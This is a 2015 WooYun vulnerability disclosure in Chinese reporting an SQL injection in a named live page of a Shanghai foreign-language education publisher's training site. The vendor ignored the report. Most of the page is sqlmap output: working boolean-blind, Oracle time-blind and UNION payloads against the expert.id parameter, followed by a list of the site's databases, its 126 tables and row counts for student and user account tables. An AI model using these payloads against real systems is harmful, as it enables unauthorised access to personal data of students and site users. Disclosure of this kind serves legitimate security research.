当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155335

漏洞标题:上海外语教育出版社某站sql注入漏洞

相关厂商:sflep.com

漏洞作者: 路人甲

提交时间:2015-11-23 19:22

修复时间:2015-11-28 19:24

公开时间:2015-11-28 19:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://www.sinoflt.com/swpx/indexExpert_getExpertInfo.action?expert.id=724


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: expert.id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: expert.id=724' AND 9497=9497 AND 'EEsS'='EEsS
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: expert.id=724' AND 6606=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(105
)||CHR(71)||CHR(102),5) AND 'bmOU'='bmOU
    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: expert.id=724' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,CHR(113)||CHR(113)||CHR(118)||CHR(120)||CHR(113)||CHR(67)||CHR(73)||CH
R(102)||CHR(111)||CHR(70)||CHR(86)||CHR(88)||CHR(73)||CHR(121)||CHR(70)||CHR(68)
||CHR(80)||CHR(75)||CHR(113)||CHR(119)||CHR(117)||CHR(72)||CHR(102)||CHR(69)||CH
R(88)||CHR(71)||CHR(83)||CHR(111)||CHR(103)||CHR(110)||CHR(111)||CHR(69)||CHR(88
)||CHR(75)||CHR(81)||CHR(113)||CHR(78)||CHR(80)||CHR(120)||CHR(69)||CHR(120)||CH
R(112)||CHR(101)||CHR(106)||CHR(78)||CHR(113)||CHR(120)||CHR(113)||CHR(112)||CHR
(113),NULL,NULL FROM DUAL-- -
---
[18:54:41] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle


漏洞证明:

available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SWPX
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


Database: SWPX
[126 tables]
+--------------------------------+
| ACTIVITION_INFO |
| ACTIVITION_SCORE |
| ACTIVITION_STUDENT |
| COURSEWARE_DIR |
| COURSEWARE_INFO |
| COURSEWARE_TEMPLATE |
| ENTITY_COURSE_ACTIVE |
| ENTITY_COURSE_COURSEWARE |
| ENTITY_COURSE_INFO |
| ENTITY_COURSE_ITEM |
| ENTITY_ELECTIVE |
| ENTITY_MANAGER_INFO |
| ENTITY_NOTE_INFO |
| ENTITY_REGISTER_INFO |
| ENTITY_RESOURCE_INFO |
| ENTITY_RESOURCE_SEMESTER |
| ENTITY_SEMESTER_INFO |
| ENTITY_STUDENT_INFO |
| ENTITY_TEACHER_COURSE |
| ENTITY_TEACHER_INFO |
| ENTITY_TEACH_CLASS |
| FRIEND_LINK |
| FTP_USER |
| INFO_MANAGER_INFO |
| INFO_NEWS |
| INFO_NEWS_TYPE |
| INFO_USER_RIGHT |
| INTERACTION_ANNOUNCE_INFO |
| INTERACTION_ANSWER_INFO |
| INTERACTION_ELITEANSWER_INFO |
| INTERACTION_ELITEQUESTION_INFO |
| INTERACTION_FORUMLIST_INFO |
| INTERACTION_FORUM_ELITE_DIR |
| INTERACTION_FORUM_INFO |
| INTERACTION_HOMEWORK_CHECK |
| INTERACTION_HOMEWORK_INFO |
| INTERACTION_INHOMEWORK_CHECK |
| INTERACTION_INHOMEWORK_INFO |
| INTERACTION_QUESTION_ELITEDIR |
| INTERACTION_QUESTION_INFO |
| INTERACTION_TEACHCLASS_INFO |
| LEAVEWORD_INFO |
| LEAVEWORD_REPLY |
| MAIL_INFO |
| ONLINEEXAM_COURSE_INFO |
| ONLINEEXAM_COURSE_PAPER |
| ONLINETEST_COURSE_INFO |
| ONLINETEST_COURSE_PAPER |
| PAPER_SELECTIVE |
| PAPER_SUBJECT_INFO |
| PLAN_TABLE |
| RESOURCE_DIR |
| RESOURCE_DIR_COURSE |
| RESOURCE_DIR_COURSE_ELITE |
| RESOURCE_DIR_COURSE_FAQ |
| RESOURCE_INFO |
| RESOURCE_RIGHT |
| RESOURCE_TYPE |
| RESOURCE_USER |
| RIGHT_INFO |
| RIGHT_MANAGER_ROLE |
| RIGHT_ROLE_INFO |
| RIGHT_ROLE_RIGHT |
| SSO_USER |
| TEST_EXAMPAPER_HISTORY |
| TEST_EXAMPAPER_INFO |
| TEST_EXPERIMENTPAPER_HISTORY |
| TEST_EXPERIMENTPAPER_INFO |
| TEST_HOMEWORKPAPER_HISTORY |
| TEST_HOMEWORKPAPER_INFO |
| TEST_LORE_DIR |
| TEST_LORE_INFO |
| TEST_PAPERPOLICY_INFO |
| TEST_PAPERQUESTION_INFO |
| TEST_STOREQUESTION_INFO |
| TEST_TESTPAPER_HISTORY |
| TEST_TESTPAPER_INFO |
| TIME_COURSE_STU |
| VOTE_PAPER |
| VOTE_QUESTION |
| VOTE_RECORD |
| VOTE_SUGGEST |
| WHATYFORUM_AGREEAGAINST |
| WHATYFORUM_BOARD |
| WHATYFORUM_BOARDAUTHUSER |
| WHATYFORUM_BOARDMASTER |
| WHATYFORUM_BOARDPERMISSION |
| WHATYFORUM_BOARDSAVE |
| WHATYFORUM_BOARDTAG |
| WHATYFORUM_BOOKMARK |
| WHATYFORUM_CHOICE |
| WHATYFORUM_CHOICECATEGORY |
| WHATYFORUM_COMMEND |
| WHATYFORUM_CONFIG |
| WHATYFORUM_ELITE |
| WHATYFORUM_FORUM |
| WHATYFORUM_FORUMARCHIVES_0 |
| WHATYFORUM_FORUMARCHIVES_1 |
| WHATYFORUM_FORUMARCHIVES_2 |
| WHATYFORUM_FORUMARCHIVES_3 |
| WHATYFORUM_FORUMARCHIVES_4 |
| WHATYFORUM_FORUMARCHIVES_5 |
| WHATYFORUM_FORUMARCHIVES_6 |
| WHATYFORUM_FORUMARCHIVES_7 |
| WHATYFORUM_FORUMARCHIVES_8 |
| WHATYFORUM_FORUMARCHIVES_9 |
| WHATYFORUM_FORUMBUY |
| WHATYFORUM_FORUM_HISTORY |
| WHATYFORUM_FRIEND |
| WHATYFORUM_GROUPROLE |
| WHATYFORUM_LOGINERROR |
| WHATYFORUM_NOTE |
| WHATYFORUM_PERMISSION |
| WHATYFORUM_ROLE |
| WHATYFORUM_SUBSCIBE |
| WHATYFORUM_SYSNUMSTAT |
| WHATYFORUM_USERDETAIL |
| WHATYFORUM_USERGROUP |
| WHATYFORUM_USERINFO |
| WHATYFORUM_USERLEVEL |
| WHATYFORUM_USERONLINE |
| WHATYFORUM_USERTOP |
| WHATYFORUM_VOTE |
| WHATYFORUM_VOTEITEM |
| WHATYFORUM_VOTEUSER |
| WHATYUSER_LOG4J |
+--------------------------------+
WHATYUSER_LOG4J | 40485 |
SSO_USER | 8618 |
ENTITY_STUDENT_INFO | 8591 |
WHATYFORUM_USERINFO | 8472 |
ENTITY_REGISTER_INFO | 8407 |
WHATYFORUM_USERDETAIL | 8300 |
WHATYFORUM_USERONLINE | 8059 |
WHATYFORUM_SYSNUMSTAT | 2430 |
INFO_NEWS | 276 |
ENTITY_RESOURCE_SEMESTER | 225 |

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-28 19:24

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无

漏洞评价:

评价